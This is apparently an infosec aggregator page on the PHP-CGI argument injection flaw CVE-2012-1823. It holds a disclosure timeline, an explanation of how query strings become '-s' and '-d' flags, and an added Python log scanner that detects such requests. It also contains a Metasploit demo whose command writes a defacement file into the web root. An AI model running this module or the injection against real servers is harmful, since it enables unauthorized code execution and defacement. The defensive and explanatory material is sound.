Description: Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Timeline :
Vulnerability discovered at Nullcon Hackim 2012 by eindbazen on 2012-01-13
Vulnerability reported to the vendor on 2012-01-17
Vulnerability accidentally disclosed on the PHP bug tracking system on 2012-05-03
Coordinated public release of the vulnerability on 2012-05-03
Metasploit PoC provided on 2012-05-04
PoC provided by:
egypt
hdm
Reference(s) :
CVE-2012-1823
OSVDB-81633
Affected versions :
PHP versions before 5.3.12
PHP versions before 5.4.2
Tested on CentOS release 6.2 (Final) with :
php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012
Description :
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary."
Note : This vulnerability was potentially exploited in the wild for at least 8 years !
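As an added example (not part of the original post or of the Metasploit module), the Python below reproduces the RFC 3875 query-to-argv rule quoted from the advisory and uses it to flag access-log requests whose query string would have reached php-cgi as option arguments; the log lines are constructed, not real traffic.

```python
"""Added example: RFC 3875 4.4 query-to-argv rule and a log check built on it."""
from urllib.parse import unquote


def cgi_argv_from_query(query: str) -> list:
    """Return the argv a CGI wrapper derives from a raw query string.

    Only when the query contains no unescaped '=' is it treated as command
    line arguments: split on '+' and URL-decoded piece by piece. Any literal
    '=' disables this; an escaped '%3d' does not, which is the subtle part.
    """
    if query == "" or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]


def flags_in_query(query: str) -> list:
    """Return derived arguments that look like php-cgi options (start with '-').

    The advisory's -s and -d reached the PHP binary exactly this way, so any
    option-like argument derived from a query is worth alerting on.
    """
    return [arg for arg in cgi_argv_from_query(query) if arg.startswith("-")]


def scan_access_log(lines) -> list:
    """Return (path, flagged_args) for combined-log lines with option-like args."""
    findings = []
    for line in lines:
        # Combined log format: ... "METHOD /path?query HTTP/1.x" ...
        try:
            request = line.split('"')[1]
            target = request.split(" ")[1]
        except IndexError:
            continue  # malformed line, skip
        path, _, query = target.partition("?")
        flagged = flags_in_query(query)
        if flagged:
            findings.append((path, flagged))
    return findings


# Constructed sample log lines (hypothetical hosts, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/May/2012:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.7 - - [04/May/2012:10:00:01 +0000] "GET /phpinfo.php?-s HTTP/1.1" 200 2048',
    '10.0.0.9 - - [04/May/2012:10:00:02 +0000] "GET /phpinfo.php?-d+display_errors%3d1 HTTP/1.1" 200 77',
    '10.0.0.9 - - [04/May/2012:10:00:03 +0000] "GET /static/logo.png HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for path, args in scan_access_log(SAMPLE_LOG):
        print(f"option-like CGI argv for {path}: {args}")
```

The third sample line shows why the check is on the raw query: the escaped `%3d` does not count as an unescaped `=`, so `-d` still becomes an argument.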
Metasploit demo :
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo owned > /var/www/html/owned.html
exploit
Tags: php, exploit, injection
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
The bug is twofold: first, using a "?-s" after a PHP file you can read the source of the file. Second, with the "?-d" you can make some temporary changes to the execution of PHP, thereby leading to code execution.
thanks
PHP CGI argument injection remote exploit. Works on versions up to 5.3.12 and 5.4.2. And online there are lots of PHP CGI remote exploit versions available.